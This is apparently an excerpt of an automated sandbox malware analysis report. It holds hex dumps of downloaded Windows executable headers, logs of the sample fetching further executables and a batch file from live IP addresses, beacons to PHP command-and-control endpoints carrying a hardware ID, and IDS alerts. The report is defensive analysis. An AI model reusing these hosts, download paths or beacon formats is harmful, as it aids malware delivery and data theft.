00 00 00 00 00 10 32 00 00 04 00 00 3c 8a 2e 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 a8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 c8 31 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 c7 31 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 a8 03 00 00 00 90 06 00 00 04 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 66 77 72 6f 74 77 75 77 00 20 2b 00 00 b0 06 00 00 1c 2b 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 77 79 69 61 6d 62 6d 78 00 10 00 00 00 d0 31 00 00 04 00 00 00 10 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 e0 31 00 00 22 00 00 00 14 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 01 Feb 2025 15:53:52 GMTContent-Type: application/octet-streamContent-Length: 1808896Last-Modified: Sat, 01 Feb 2025 15:09:15 GMTConnection: keep-aliveETag: "679e391b-1b9a00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 cb bd 98 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 2a 01 00 00 00 00 00 00 70 69 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 a0 69 00 00 04 00 00 aa c4 1b 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 a0 24 00 8c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 68 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 8c 03 00 00 00 a0 24 00 00 04 00 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 a0 2a 00 00 c0 24 00 00 02 00 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 62 7a 69 70 6a 68 72 61 00 00 1a 00 00 60 4f 00 00 f4 19 00 00 80 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 69 77 6f 72 65 69 74 71 00 10 00 00 00 60 69 00 00 04 00 00 00 74 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 70 69 00 00 22 00 00 00 78 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 01 Feb 2025 15:53:54 GMTContent-Type: application/octet-streamContent-Length: 3028480Last-Modified: Sat, 01 Feb 2025 15:09:26 GMTConnection: keep-aliveETag: "679e3926-2e3600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 98 01 00 00 00 00 00 00 e0 31 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 32 00 00 04 00 00 3c 8a 2e 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 a8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 c8 31 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 c7 31 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 a8 03 00 00 00 90 06 00 00 04 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 66 77 72 6f 74 77 75 77 00 20 2b 00 00 b0 06 00 00 1c 2b 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 77 79 69 61 6d 62 6d 78 00 10 00 00 00 d0 31 00 00 04 00 00 00 10 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 e0 31 00 00 22 00 00 00 14 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 01 Feb 2025 15:53:57 GMTContent-Type: application/octet-streamContent-Length: 3028480Last-Modified: Sat, 01 Feb 2025 15:09:26 GMTConnection: keep-aliveETag: "679e3926-2e3600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 98 01 00 00 00 00 00 00 e0 31 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 32 00 00 04 00 00 3c 8a 2e 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 a8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 c8 31 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 c7 31 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 a8 03 00 00 00 90 06 00 00 04 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 66 77 72 6f 74 77 75 77 00 20 2b 00 00 b0 06 00 00 1c 2b 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 77 79 69 61 6d 62 6d 78 00 10 00 00 00 d0 31 00 00 04 00 00 00 10 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 e0 31 00 00 22 00 00 00 14 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Source: global trafficHTTP traffic detected: GET /forsale/infinity.exe HTTP/1.1Host: 91.240.118.49
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.115Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IEHJDGIDBAAFIDGCGCAKHost: 185.215.113.115Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 45 48 4a 44 47 49 44 42 41 41 46 49 44 47 43 47 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 44 34 41 46 36 37 39 32 43 45 32 33 39 32 34 36 39 36 33 33 30 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 4a 44 47 49 44 42 41 41 46 49 44 47 43 47 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6b 69 72 61 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 4a 44 47 49 44 42 41 41 46 49 44 47 43 47 43 41 4b 2d 2d 0d 0a Data Ascii: ------IEHJDGIDBAAFIDGCGCAKContent-Disposition: form-data; name="hwid"BD4AF6792CE23924696330------IEHJDGIDBAAFIDGCGCAKContent-Disposition: form-data; name="build"kira------IEHJDGIDBAAFIDGCGCAK--
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 30 32 39 37 39 42 30 35 43 38 32 44 31 32 46 44 36 36 30 41 39 32 36 42 34 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B02979B05C82D12FD660A926B464F71F462AE478222FFDED0F8E1F939F
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 36 31 36 38 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1061683001&unit=246122658369
                            Source: global trafficHTTP traffic detected: GET /files/941767796/ktIplF5.exe HTTP/1.1Host: 185.215.113.97
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 36 32 30 34 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1062048001&unit=246122658369
                            Source: global trafficHTTP traffic detected: GET /files/Cyber_Yoda/random.exe HTTP/1.1Host: 185.215.113.97
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 36 32 31 32 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1062121001&unit=246122658369
                            Source: global trafficHTTP traffic detected: GET /files/asjduwgsgausi/random.exe HTTP/1.1Host: 185.215.113.97
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 36 32 31 32 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1062122001&unit=246122658369
                            Source: global trafficHTTP traffic detected: GET /files/sawdu5t/random.exe HTTP/1.1Host: 185.215.113.97
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 36 32 31 32 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1062123001&unit=246122658369
                            Source: global trafficHTTP traffic detected: GET /files/c0dxnfz/random.exe HTTP/1.1Host: 185.215.113.97
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 36 32 31 32 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1062124001&unit=246122658369
                            Source: global trafficHTTP traffic detected: GET /files/sunnywebZ/random.exe HTTP/1.1Host: 185.215.113.97
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 36 32 31 32 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1062125001&unit=246122658369
                            Source: global trafficHTTP traffic detected: GET /files/initlosizz198hyjdr/random.exe HTTP/1.1Host: 185.215.113.97
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 36 32 31 32 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1062126001&unit=246122658369
                            Source: global trafficHTTP traffic detected: GET /files/martin1/random.exe HTTP/1.1Host: 185.215.113.97
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 36 32 31 32 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1062127001&unit=246122658369
                            Source: global trafficHTTP traffic detected: GET /testdef/random.exe HTTP/1.1Host: 185.215.113.16
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 36 32 31 32 38 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1062128101&unit=246122658369
                            Source: global trafficHTTP traffic detected: GET /test/am_no.bat HTTP/1.1Host: 185.215.113.16
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 36 32 31 32 39 30 32 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1062129021&unit=246122658369
                            Source: global trafficHTTP traffic detected: GET /files/notfinancing/random.exe HTTP/1.1Host: 185.215.113.97
                            Source: global trafficHTTP traffic detected: GET /defend/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 36 32 31 33 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1062130001&unit=246122658369
                            Source: global trafficHTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 36 32 31 33 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1062131001&unit=246122658369
                            Source: global trafficHTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 36 32 31 33 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1062132001&unit=246122658369
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.115Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
                            Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECAKKKKJDBKKFIEBKEHDHost: 185.215.113.115Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 41 4b 4b 4b 4b 4a 44 42 4b 4b 46 49 45 42 4b 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 44 34 41 46 36 37 39 32 43 45 32 33 39 32 34 36 39 36 33 33 30 0d 0a 2d 2d 2d 2d 2d 2d 45 43 41 4b 4b 4b 4b 4a 44 42 4b 4b 46 49 45 42 4b 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6b 69 72 61 0d 0a 2d 2d 2d 2d 2d 2d 45 43 41 4b 4b 4b 4b 4a 44 42 4b 4b 46 49 45 42 4b 45 48 44 2d 2d 0d 0a Data Ascii: ------ECAKKKKJDBKKFIEBKEHDContent-Disposition: form-data; name="hwid"BD4AF6792CE23924696330------ECAKKKKJDBKKFIEBKEHDContent-Disposition: form-data; name="build"kira------ECAKKKKJDBKKFIEBKEHD--
                            Source: global trafficHTTP traffic detected: GET /defend/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
                            Source: Joe Sandbox ViewIP Address: 185.215.113.43 185.215.113.43
                            Source: Joe Sandbox ViewIP Address: 185.215.113.97 185.215.113.97
                            Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                            Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                            Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49707 -> 104.21.18.116:443
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49710 -> 104.21.18.116:443
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49708 -> 104.21.18.116:443
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49719 -> 104.21.18.116:443
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49750 -> 104.21.18.116:443
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49742 -> 104.21.18.116:443
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49727 -> 104.21.18.116:443
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49765 -> 104.21.18.116:443
                            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.11:53465 -> 91.240.118.49:443
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:53467 -> 185.215.113.97:80
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:53471 -> 104.21.18.116:443
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:53472 -> 185.215.113.97:80
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:53473 -> 104.21.18.116:443
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:53476 -> 104.21.18.116:443
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:53477 -> 185.215.113.97:80
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:53478 -> 104.21.18.116:443
